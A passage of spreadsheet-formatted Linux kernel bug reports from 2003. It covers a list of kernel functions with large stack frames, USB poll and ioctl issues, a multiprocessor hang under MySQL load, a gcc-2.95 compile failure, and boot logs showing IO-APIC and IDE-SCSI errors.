&lt;nfs_mknod+6&gt;: sub $0x17c,%esp 0xc01d71e3 &lt;udf_find_entry+6&gt;: sub $0x178,%esp 0xc01b333d &lt;nfs_create+6&gt;: sub $0x178,%esp 0xc01b35ca &lt;nfs_mkdir+6&gt;: sub $0x174,%esp 0xc02873a3 &lt;radeon_cp_vertex2+3&gt;: sub $0x16c,%esp 0xc01583a5 &lt;do_execve+3&gt;: sub $0x158,%esp 0xc033e177 &lt;snd_seq_oss_ioctl+3&gt;: sub $0x154,%esp 0xc02f13d9 &lt;mmc_ioctl+3&gt;: sub $0x154,%esp 0xc017d267 &lt;elf_kcore_store_hdr+6&gt;: sub $0x150,%esp 0xc01f048d &lt;reiserfs_readdir+6&gt;: sub $0x148,%esp 0xc01b28aa &lt;nfs_lookup_revalidate+11&gt;: sub $0x148,%esp 0xc036d0e8 &lt;rt_cache_seq_show+6&gt;: sub $0x144,%esp 0xc01d4115 &lt;udf_fill_inode+6&gt;: sub $0x144,%esp 0xc032fec8 &lt;snd_pcm_info_user+3&gt;: sub $0x140,%esp 0xc0286167 &lt;radeon_cp_clear+3&gt;: sub $0x13c,%esp 0xc019608f &lt;journal_commit_transaction+6&gt;: sub $0x13c,%esp 0xc0174db5 &lt;load_elf_binary+20&gt;: sub $0x13c,%esp 0xc03b5ba4 &lt;ip_map_parse+3&gt;: sub $0x138,%esp 0xc035c698 &lt;sys_sendmsg+8&gt;: sub $0x134,%esp 0xc02f66fe &lt;read_tuple+3&gt;: sub $0x134,%esp 0xc01b2ed9 &lt;nfs_lookup+6&gt;: sub $0x134,%esp 0xc0172105 &lt;aout_core_dump+21&gt;: sub $0x134,%esp 0xc02df535 &lt;ahc_linux_proc_info+11&gt;: sub $0x130,%esp 0xc02d8097 &lt;ahc_linux_info+16&gt;: sub $0x130,%esp 0xc034d3db &lt;snd_rawmidi_info_select_user+3&gt;: sub $0x12c,%esp 0xc032e77a &lt;snd_pcm_proc_info_read+4&gt;: sub $0x12c,%esp 0xc0308874 &lt;proc_getdriver+3&gt;: sub $0x12c,%esp 0xc01d4c5c &lt;udf_update_inode+6&gt;: sub $0x12c,%esp 0xc034d2a5 &lt;snd_rawmidi_info_user+3&gt;: sub $0x128,%esp 0xc01e148f &lt;udf_put_filename+3&gt;: sub $0x128,%esp 0xc01d9c88 &lt;udf_rename+6&gt;: sub $0x128,%esp 0xc0325433 &lt;snd_mixer_oss_build_test+3&gt;: sub $0x124,%esp 0xc0321351 &lt;snd_ctl_elem_info+11&gt;: sub $0x124,%esp 0xc02f4c26 &lt;verify_cis_cache+6&gt;: sub $0x124,%esp 0xc0242307 &lt;acpi_pci_bind+32&gt;: sub $0x124,%esp 0xc01e8aff &lt;reiserfs_add_entry+11&gt;: sub $0x124,%esp 0xc01cc029 &lt;nlmsvc_proc_granted_msg+3&gt;: sub $0x124,%esp 0xc01cbfab &lt;nlmsvc_proc_unlock_msg+3&gt;: sub $0x124,%esp 0xc01cbf2d &lt;nlmsvc_proc_cancel_msg+3&gt;: sub $0x124,%esp 0xc01cbeaf &lt;nlmsvc_proc_lock_msg+3&gt;: sub $0x124,%esp 0xc01cbe31 &lt;nlmsvc_proc_test_msg+3&gt;: sub $0x124,%esp 0xc017c649 &lt;meminfo_read_proc+15&gt;: sub $0x124,%esp 0xc016a6b5 &lt;setxattr+8&gt;: sub $0x124,%esp 0xc01e37ef &lt;autofs4_expire_run+12&gt;: sub $0x120,%esp 0xc0198244 &lt;log_do_checkpoint+6&gt;: sub $0x120,%esp 0xc016a969 &lt;getxattr+3&gt;: sub $0x120,%esp 0xc0257e97 &lt;parport_pc_probe_port+12&gt;: sub $0x11c,%esp 0xc024263a &lt;acpi_pci_bind_root+32&gt;: sub $0x11c,%esp 0xc01e3118 &lt;autofs4_notify_daemon+12&gt;: sub $0x11c,%esp 0xc035c92a &lt;sys_recvmsg+3&gt;: sub $0x118,%esp 0xc031c91e &lt;i8042_interrupt+8&gt;: sub $0x118,%esp 0xc02ee068 &lt;sg_proc_hoststrs_info+6&gt;: sub $0x118,%esp 0xc02551f0 &lt;do_autoprobe+3&gt;: sub $0x118,%esp 0xc0241aab &lt;acpi_pci_irq_add_prt+20&gt;: sub $0x118,%esp 0xc016adc3 &lt;removexattr+3&gt;: sub $0x118,%esp 0xc02deecd &lt;copy_info+3&gt;: sub $0x114,%esp 0xc02c05c8 &lt;scsi_request_sense+6&gt;: sub $0x114,%esp 0xc020c619 &lt;sys_shmctl+3&gt;: sub $0x114,%esp 0xc0203c55 &lt;reiserfs_breada+6&gt;: sub $0x114,%esp 0xc012a88b &lt;sys_reboot+10&gt;: sub $0x114,%esp 0xc052aeea &lt;pirq_peer_trick+13&gt;: sub $0x110,%esp 0xc01a059f &lt;ext2_get_parent+3&gt;: sub $0x110,%esp 0xc01719cf &lt;ep_events_transfer+11&gt;: sub $0x110,%esp 0xc02efd9b &lt;dvd_read_bca+3&gt;: sub $0x10c,%esp 0xc02550e0 &lt;do_active_device+8&gt;: sub $0x10c,%esp 0xc01d2ab5 &lt;inode_getblk+6&gt;: sub $0x10c,%esp 0xc01898b5 &lt;ext3_get_parent+12&gt;: sub $0x10c,%esp 0xc024839d &lt;acpi_bus_match+8&gt;: sub $0x108,%esp 0xc029ac87 &lt;e100_do_ethtool_ioctl+10&gt;: sub $0x100,%esp 0xc01beba6 &lt;write_filehandle+3&gt;: sub $0x100,%esp</t>
  </si>
  <si>
    <t>poll on usb device does not return immediatly when device is unplugged</t>
  </si>
  <si>
    <t>2003-02-21 00:45 UTC</t>
  </si>
  <si>
    <t>Andreas Jellinghaus</t>
  </si>
  <si>
    <t>2004-12-12 12:29 UTC</t>
  </si>
  <si>
    <t>Any USB device. open the /proc/bus/usb/... device, poll on it for changes, unplug the device manual. The poll call does return the right values, but only when it times out. Poll calls without a timeout seem to return never.</t>
  </si>
  <si>
    <t>2.5.60/ioctl on usb device returns wrong length</t>
  </si>
  <si>
    <t>2003-02-21 00:49 UTC</t>
  </si>
  <si>
    <t>2003-06-28 09:39 UTC</t>
  </si>
  <si>
    <t>Talking to a usb device (here: Aladdin eToken PRO) from userspace via /proc/bus/usb/... devices and ioctrl: issuing control transfers. I'm sure the device does return 13 bytes, but the return value I see in userspace is 40 bytes (thats the wlength parameter I used).</t>
  </si>
  <si>
    <t>System hang with MySql workload</t>
  </si>
  <si>
    <t>2003-02-21 12:22 UTC</t>
  </si>
  <si>
    <t>James M Kenefick Jr.</t>
  </si>
  <si>
    <t>2003-04-03 05:56 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: x86 8 processor system with 12Gb ram 2 30gb scsi, intel pro 1000 and 5 client systems Software Environment: MySql server on 8-way, version 3.23.52-3 dbgrinder.pl from ltp.sf.net on clients Problem Description: A MySql database server running on an 8-way x86 system with load driven from 5 clients (5 instance of dbgrinder.pl on each system). Server hangs with no information provided as to cause, this hangs the primary console(alt-f1) always and normally hangs the others as well. Additionaly all network connectivity is lost. Initialy created on 2.5.58 kernel, suspected issue with signal handling. Error has been reproduced through latest tested kernel, 2.5.62 Server was only at 30% utilization at time hang. This hang is related the load being driven on the system, when the test was executed with only 2 client systems (10 instances) the server functioned properly for 10+ hours, after load increased, 4-5 client systems (20-25 instances) a hang would occur within 2 hours. Ran test against a uniprocessor server and did not reproduce hang. Steps to reproduce: 1.)Install and start up Mysql on server, 2.)Install dbgrinder.pl on 5 client systems Note: this will require DBI and DBD:mysql from cpan.org 3.)Execute 5 instances of dbgringer.pl on each client all pointed at the server, within 2 hours the server will hang</t>
  </si>
  <si>
    <t>2.5.62-bk5 compile failure with gcc-2.95</t>
  </si>
  <si>
    <t>2.5.62-bk5</t>
  </si>
  <si>
    <t>2003-02-22 11:32 UTC</t>
  </si>
  <si>
    <t>2003-02-23 05:00 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian stable Hardware Environment:pIII-800 Software Environment:gcc-2.95 Problem Description: I got this compile failure on the nightly bk pull test last night. It should match up to what's in -bk5: gcc -Wp,-MD,drivers/pnp/.interface.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=interface -DKBUILD_MODNAME=interface -c -o drivers/pnp/interface.o drivers/pnp/interface.c drivers/pnp/interface.c: In function `pnp_set_current_resources': drivers/pnp/interface.c:438: parse error before `struct' drivers/pnp/interface.c:440: `res' undeclared (first use in this function) drivers/pnp/interface.c:440: (Each undeclared identifier is reported only once drivers/pnp/interface.c:440: for each function it appears in.) drivers/pnp/interface.c:448: `nport' undeclared (first use in this function) drivers/pnp/interface.c:468: `nmem' undeclared (first use in this function) drivers/pnp/interface.c:488: `nirq' undeclared (first use in this function) drivers/pnp/interface.c:500: `ndma' undeclared (first use in this function) make[2]: *** [drivers/pnp/interface.o] Error 1 make[1]: *** [drivers/pnp] Error 2 make: *** [drivers] Error 2 Steps to reproduce: I tried reproducing this with gcc-3.2 and it compiles fine, but when I switch to 2.95 it breaks.</t>
  </si>
  <si>
    <t>unexpected IO-APIC, please file a report at...</t>
  </si>
  <si>
    <t>2003-02-23 06:28 UTC</t>
  </si>
  <si>
    <t>2004-12-06 01:07 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: P-IV 2.4GHz, with ht flag, though not supported by MB Asus P4S8X MB 512 MB RAM Software Environment: Problem Description: ENABLING IO-APIC IRQs init IO_APIC IRQs IO-APIC (apicid-pin) 2-0, 2-16, 2-17, 2-18, 2-19, 2-21, 2-22, 2-23 not connected. ..TIMER: vector=0x31 pin1=2 pin2=0 number of MP IRQ sources: 17. number of IO-APIC #2 registers: 24. testing the IO APIC....................... IO APIC #2...... .... register #00: 02000000 ....... : physical APIC id: 02 ....... : Delivery Type: 0 ....... : LTS : 0 .... register #01: 00178080 ....... : max redirection entries: 0017 ....... : PRQ implemented: 1 ....... : IO APIC version: 0080 INFO: unexpected IO-APIC, please file a report at http://bugzilla.kernel.org if your kernel is less than 3 months old. .... register #02: 02000000 ....... : arbitration: 02 Steps to reproduce: Just boot and look at messages... Complete dmesg bellow : CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Hyper-Threading is disabled CPU: After generic, caps: 3febfbff 00000000 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU#0: Intel P4/Xeon Extended MCE MSRs (12) available CPU#0: Thermal monitoring enabled Machine check exception polling timer started. Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX CPU0: Intel(R) Pentium(R) 4 CPU 2.40GHz stepping 04 per-CPU timeslice cutoff: 1462.72 usecs. task migration cache decay timeout: 2 msecs. enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Error: only one processor found. ENABLING IO-APIC IRQs init IO_APIC IRQs IO-APIC (apicid-pin) 2-0, 2-16, 2-17, 2-18, 2-19, 2-21, 2-22, 2-23 not connected. ..TIMER: vector=0x31 pin1=2 pin2=0 number of MP IRQ sources: 17. number of IO-APIC #2 registers: 24. testing the IO APIC....................... IO APIC #2...... .... register #00: 02000000 ....... : physical APIC id: 02 ....... : Delivery Type: 0 ....... : LTS : 0 .... register #01: 00178080 ....... : max redirection entries: 0017 ....... : PRQ implemented: 1 ....... : IO APIC version: 0080 INFO: unexpected IO-APIC, please file a report at http://bugzilla.kernel.org if your kernel is less than 3 months old. .... register #02: 02000000 ....... : arbitration: 02 .... IRQ redirection table: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: 00 000 00 1 0 0 0 0 0 0 00 01 001 01 0 0 0 0 0 1 1 39 02 001 01 0 0 0 0 0 1 1 31 03 001 01 0 0 0 0 0 1 1 41 04 001 01 0 0 0 0 0 1 1 49 05 001 01 0 0 0 0 0 1 1 51 06 001 01 0 0 0 0 0 1 1 59 07 001 01 0 0 0 0 0 1 1 61 08 001 01 0 0 0 0 0 1 1 69 09 001 01 0 0 0 0 0 1 1 71 0a 001 01 0 0 0 0 0 1 1 79 0b 001 01 0 0 0 0 0 1 1 81 0c 001 01 0 0 0 0 0 1 1 89 0d 001 01 0 0 0 0 0 1 1 91 0e 001 01 0 0 0 0 0 1 1 99 0f 001 01 0 0 0 0 0 1 1 A1 10 000 00 1 0 0 0 0 0 0 00 11 000 00 1 0 0 0 0 0 0 00 12 000 00 1 0 0 0 0 0 0 00 13 000 00 1 0 0 0 0 0 0 00 14 001 01 1 1 0 1 0 1 1 71 15 000 00 1 0 0 0 0 0 0 00 16 000 00 1 0 0 0 0 0 0 00 17 000 00 1 0 0 0 0 0 0 00 IRQ to pin mappings: IRQ0 -&gt; 0:2 IRQ1 -&gt; 0:1 IRQ3 -&gt; 0:3 IRQ4 -&gt; 0:4 IRQ5 -&gt; 0:5 IRQ6 -&gt; 0:6 IRQ7 -&gt; 0:7 IRQ8 -&gt; 0:8 IRQ9 -&gt; 0:9-&gt; 0:20 IRQ10 -&gt; 0:10 IRQ11 -&gt; 0:11 IRQ12 -&gt; 0:12 IRQ13 -&gt; 0:13 IRQ14 -&gt; 0:14 IRQ15 -&gt; 0:15 .................................... done. Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 2423.0432 MHz. ..... host bus clock speed is 134.0635 MHz. Starting migration thread for cpu 0 CPUS done 2 Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket mtrr: v2.0 (20020519) PCI: PCI BIOS revision 2.10 entry at 0xf11a0, last bus=1 PCI: Using configuration type 1 BIO: pool of 256 setup, 14Kb (56 bytes/bio) biovec pool[0]: 1 bvecs: 256 entries (12 bytes) biovec pool[1]: 4 bvecs: 256 entries (48 bytes) biovec pool[2]: 16 bvecs: 256 entries (192 bytes) biovec pool[3]: 64 bvecs: 256 entries (768 bytes) biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) ACPI: Subsystem revision 20030122 IOAPIC[0]: Set PCI routing entry (2-9 -&gt; 0x71 -&gt; IRQ 9) ACPI-0262: *** Info: GPE Block0 defined as GPE0 to GPE15 ACPI-0262: *** Info: GPE Block1 defined as GPE16 to GPE31 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1._PRT] Linux Plug and Play Support v0.94 (c) Adam Belay block request queues: 128 requests per read queue 128 requests per write queue 8 requests per batch enter congestion at 15 exit congestion at 17 drivers/usb/core/usb.c: registered new driver hub IOAPIC[0]: Set PCI routing entry (2-16 -&gt; 0xa9 -&gt; IRQ 16) 00:00:02[A] -&gt; 2-16 -&gt; IRQ 16 IOAPIC[0]: Set PCI routing entry (2-17 -&gt; 0xb1 -&gt; IRQ 17) 00:00:02[B] -&gt; 2-17 -&gt; IRQ 17 IOAPIC[0]: Set PCI routing entry (2-18 -&gt; 0xb9 -&gt; IRQ 18) 00:00:02[C] -&gt; 2-18 -&gt; IRQ 18 IOAPIC[0]: Set PCI routing entry (2-19 -&gt; 0xc1 -&gt; IRQ 19) 00:00:02[D] -&gt; 2-19 -&gt; IRQ 19 IOAPIC[0]: Set PCI routing entry (2-20 -&gt; 0xc9 -&gt; IRQ 20) 00:00:03[A] -&gt; 2-20 -&gt; IRQ 20 IOAPIC[0]: Set PCI routing entry (2-21 -&gt; 0xd1 -&gt; IRQ 21) 00:00:03[B] -&gt; 2-21 -&gt; IRQ 21 IOAPIC[0]: Set PCI routing entry (2-22 -&gt; 0xd9 -&gt; IRQ 22) 00:00:03[C] -&gt; 2-22 -&gt; IRQ 22 IOAPIC[0]: Set PCI routing entry (2-23 -&gt; 0xe1 -&gt; IRQ 23) 00:00:03[D] -&gt; 2-23 -&gt; IRQ 23 Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed PCI: Using ACPI for IRQ routing PCI: if you experience problems, try using option 'pci=noacpi' or even 'acpi=off' SBF: Simple Boot Flag extension found and enabled. SBF: Setting boot flags 0x1 cpufreq: P4/Xeon(TM) CPU On-Demand Clock Modulation available IA-32 Microcode Update Driver: v1.11 &lt;tigran@veritas.com&gt; Starting balanced_irq Enabling SEP on CPU 0 aio_setup: sizeof(struct page) = 40 VFS: Disk quotas dquot_6.5.1 Journalled Block Device driver loaded Installing knfsd (copyright (C) 1996 okir@monad.swb.de). NTFS driver 2.1.0 [Flags: R/O]. udf: registering filesystem Capability LSM initialized Initializing Cryptographic API ACPI: Power Button (FF) [PWRF] ACPI: Processor [CPU0] (supports C1, 8 throttling states) Serial: 8250/16550 driver $Revision: 1.90 $ IRQ sharing disabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE,EPP] parport0: irq 7 detected parport0: cpp_daisy: aa5500ff(98) parport0: assign_addrs: aa5500ff(98) parport0: Printer, HEWLETT-PACKARD DESKJET 920C pty: 256 Unix98 ptys configured lp0: using parport0 (polling). Real Time Clock Driver v1.11 Non-volatile memory driver v1.2 Linux agpgart interface v0.100 (c) Dave Jones agpgart: Unsupported SiS chipset (device id: 0648), you might want to try agp_try_unsupported=1. [drm] Initialized radeon 1.7.0 20020828 on minor 0 Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize loop: loaded (max 8 devices) 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 00:0a.0: 3Com PCI 3c905 Boomerang 100baseTx at 0x7400. Vers LK1.1.19 pcnet32.c:v1.27b 01.10.2002 tsbogend@alpha.franken.de PPP generic driver version 2.4.2 PPP Deflate Compression module registered PPP BSD Compression module registered Universal TUN/TAP device driver 1.5 (C)1999-2002 Maxim Krasnyansky Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx SIS5513: IDE controller at PCI slot 00:02.5 SIS5513: chipset revision 0 SIS5513: not 100% native mode: will probe irqs later SiS648 ATA 133 controller ide0: BM-DMA at 0xa400-0xa407, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0xa408-0xa40f, BIOS settings: hdc:DMA, hdd:DMA hda: WDC WD800BB-00CAA1, ATA DISK drive hdb: IC35L040AVER07-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: MATSHITADVD-ROM SR-8584A, ATAPI CD/DVD-ROM drive hdd: TDK CDRW4800B, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: host protected area =&gt; 1 hda: 156301488 sectors (80026 MB) w/2048KiB Cache, CHS=155061/16/63, UDMA(100) hda: hda1 hda2 hda3 &lt; hda5 hda6 hda7 hda8 &gt; hda4 hdb: host protected area =&gt; 1 hdb: 80418240 sectors (41174 MB) w/1916KiB Cache, CHS=79780/16/63, UDMA(100) hdb: hdb1 hdb2 hdb3 &lt; hdb5 hdb6 &gt; hdc: ATAPI 32X DVD-ROM drive, 512kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 end_request: I/O error, dev hdc, sector 0 hdd: ATAPI 48X CD-ROM CD-R/RW drive, 2048kB Cache, UDMA(33) end_request: I/O error, dev hdd, sector 0 ide-floppy driver 0.99.newide scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.28 &lt;Adaptec 2940 Ultra2 SCSI adapter&gt; aic7890/91: Ultra2 Wide Channel A, SCSI Id=7, 32/253 SCBs (scsi0:A:0): 40.000MB/s transfers (20.000MHz, offset 127, 16bit) Vendor: FUJITSU Model: MAN3367MP Rev: 5507 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:0:0: Tagged Queuing enabled. Depth 64 APIC error on CPU0: 00(40) SCSI device sda: 71132959 512-byte hdwr sectors (36420 MB) SCSI device sda: drive cache: write through sda: sda1 sda2 sda3 sda4 &lt; sda5 sda6 &gt; Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 ehci-hcd 00:03.3: Silicon Integrated S SiS7002 USB 2.0 ehci-hcd 00:03.3: irq 23, pci mem e081e000 ehci-hcd 00:03.3: new USB bus registered, assigned bus number 1 PCI: 00:03.3 PCI cache line size set incorrectly (32 bytes) by BIOS/FW, correcting to 128 ehci-hcd 00:03.3: USB 2.0 enabled, EHCI 1.00, driver 2003-Jan-22 hub 1-0:0: USB hub found hub 1-0:0: 6 ports detected ohci-hcd 00:03.0: Silicon Integrated S 7001 ohci-hcd 00:03.0: irq 20, pci mem e0820000 ohci-hcd 00:03.0: new USB bus registered, assigned bus number 2 hub 2-0:0: USB hub found hub 2-0:0: 2 ports detected ohci-hcd 00:03.1: Silicon Integrated S 7001 (#2) ohci-hcd 00:03.1: irq 21, pci mem e0822000 ohci-hcd 00:03.1: new USB bus registered, assigned bus number 3 hub 3-0:0: USB hub found hub 3-0:0: 2 ports detected ohci-hcd 00:03.2: Silicon Integrated S 7001 (#3) ohci-hcd 00:03.2: irq 22, pci mem e0824000 ohci-hcd 00:03.2: new USB bus registered, assigned bus number 4 hub 1-0:0: debounce: port 3: delay 100ms stable 4 status 0x501 hub 4-0:0: USB hub found hub 4-0:0: 2 ports detected drivers/usb/host/uhci-hcd.c: USB Universal Host Controller Interface driver v2.0 drivers/usb/core/usb.c: registered new driver usbscanner drivers/usb/image/scanner.c: 0.4.10:USB Scanner Driver mice: PS/2 mouse device common for all mice input: PC Speaker input: PS/2 Logitech Mouse on isa0060/serio1 serio: i8042 AUX port at 0x60,0x64 irq 12 input: AT Set 2 keyboard on isa0060/serio0 serio: i8042 KBD port at 0x60,0x64 irq 1 Advanced Linux Sound Architecture Driver Version 0.9.0rc7 (Sat Feb 15 15:01:21 2003 UTC). ALSA device list: #0: Sound Blaster Live! (rev.7) at 0x8000, irq 17 NET4: Linux TCP/IP 1.0 for NET4.0 IP: routing cache hash table of 4096 buckets, 32Kbytes TCP: Hash tables configured (established 32768 bind 32768) IPv4 over IPv4 tunneling driver GRE over IPv4 tunneling driver ip_tables: (C) 2000-2002 Netfilter core team Initializing IPsec netlink socket NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. IPv6 v0.8 for NET4.0 IPv6 over IPv4 tunneling driver kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 384k freed hub 4-0:0: debounce: port 1: delay 100ms stable 4 status 0x101 hub 4-0:0: new USB device on port 1, assigned address 2 Adding 2096440k swap on /dev/hda6. Priority:-1 extents:1 Adding 530104k swap on /dev/hdb1. Priority:-2 extents:1 Adding 1049576k swap on /dev/sda5. Priority:-3 extents:1 EXT3 FS 2.4-0.9.16, 02 Dec 2001 on ide0(3,2), internal journal kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on ide0(3,8), internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on ide0(3,4), internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on ide0(3,7), internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sd(8,1), internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS 2.4-0.9.16, 02 Dec 2001 on sd(8,3), internal journal EXT3-fs: mounted filesystem with ordered data mode. found reiserfs format "3.6" with standard journal APIC error on CPU0: 40(40) Reiserfs journal params: device sd(8,6), size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 reiserfs: checking transaction log (sd(8,6)) for (sd(8,6)) Using r5 hash to sort names found reiserfs format "3.6" with standard journal Reiserfs journal params: device ide0(3,70), size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 reiserfs: checking transaction log (ide0(3,70)) for (ide0(3,70)) Using r5 hash to sort names NTFS-fs warning (device ide0(3,1)): parse_options(): Option utf8 is no longer supported, using option nls=utf8. Please use option nls=utf8 in the future and make sure utf8 is compiled either as a module or into the kernel. NTFS volume version 3.0. NTFS-fs warning (device ide0(3,5)): parse_options(): Option utf8 is no longer supported, using option nls=utf8. Please use option nls=utf8 in the future and make sure utf8 is compiled either as a module or into the kernel. NTFS volume version 3.0. eth0: no IPv6 routers present blk: queue c061181c, I/O limit 4095Mb (mask 0xffffffff) blk: queue c0611b10, I/O limit 4095Mb (mask 0xffffffff) warning: process `update' used the obsolete bdflush system call Fix your initscripts? warning: process `update' used the obsolete bdflush system call Fix your initscripts? tap0: no IPv6 routers present</t>
  </si>
  <si>
    <t>IDE-SCSI : bad: scheduling while atomic</t>
  </si>
  <si>
    <t>2003-02-23 06:41 UTC</t>
  </si>
  <si>
    <t>2004-12-02 07:47 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: P4S8X MB P-IV 2 IDE HD 1 IDE CD-ROM 1 IDE DVD 1 SCSI HD Software Environment: Kernel 2.5.62 Lilo contains : image=/boot/vmlinuz-2.5.62-smp-acpi label=test append="panic=30 hdd=ide-scsi console=ttyS0 console=tty1" read-only Problem Description: While booting : ... SIS5513: IDE controller at PCI slot 00:02.5 SIS5513: chipset revision 0 SIS5513: not 100% native mode: will probe irqs later SiS648 ATA 133 controller ide0: BM-DMA at 0xa400-0xa407, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0xa408-0xa40f, BIOS settings: hdc:DMA, hdd:DMA hda: WDC WD800BB-00CAA1, ATA DISK drive hdb: IC35L040AVER07-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: MATSHITADVD-ROM SR-8584A, ATAPI CD/DVD-ROM drive hdd: TDK CDRW4800B, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: host protected area =&gt; 1 hda: 156301488 sectors (80026 MB) w/2048KiB Cache, CHS=155061/16/63, UDMA(100) hda: hda1 hda2 hda3 &lt; hda5 hda6 hda7 hda8 &gt; hda4 hdb: host protected area =&gt; 1 hdb: 80418240 sectors (41174 MB) w/1916KiB Cache, CHS=79780/16/63, UDMA(100) hdb: hdb1 hdb2 hdb3 &lt; hdb5 hdb6 &gt; hdc: ATAPI 32X DVD-ROM drive, 512kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 end_request: I/O error, dev hdc, sector 0 ide-floppy driver 0.99.newide scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.28 &lt;Adaptec 2940 Ultra2 SCSI adapter&gt; aic7890/91: Ultra2 Wide Channel A, SCSI Id=7, 32/253 SCBs (scsi0:A:0): 40.000MB/s transfers (20.000MHz, offset 127, 16bit) Vendor: FUJITSU Model: MAN3367MP Rev: 5507 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:0:0: Tagged Queuing enabled. Depth 64 scsi1 : SCSI host adapter emulation for IDE ATAPI devices Vendor: TDK Model: CDRW4800B Rev: S7S3 Type: CD-ROM ANSI SCSI revision: 02 ide-scsi: abort called for 21 bad: scheduling while atomic! Call Trace: [&lt;c011e242&gt;] schedule+0x34e/0x354 [&lt;c02bf623&gt;] poke_blanked_console+0x53/0x6e [&lt;c0109c2e&gt;] __down+0xa4/0x11a [&lt;c011e298&gt;] default_wake_function+0x0/0x12 [&lt;c0123010&gt;] __call_console_drivers+0x58/0x5a [&lt;c0109e80&gt;] __down_failed+0x8/0xc [&lt;c031ddbd&gt;] .text.lock.scsi_error+0x8e/0xa9 [&lt;c031d46e&gt;] scsi_sleep_done+0x0/0x12 [&lt;c034a7c2&gt;] 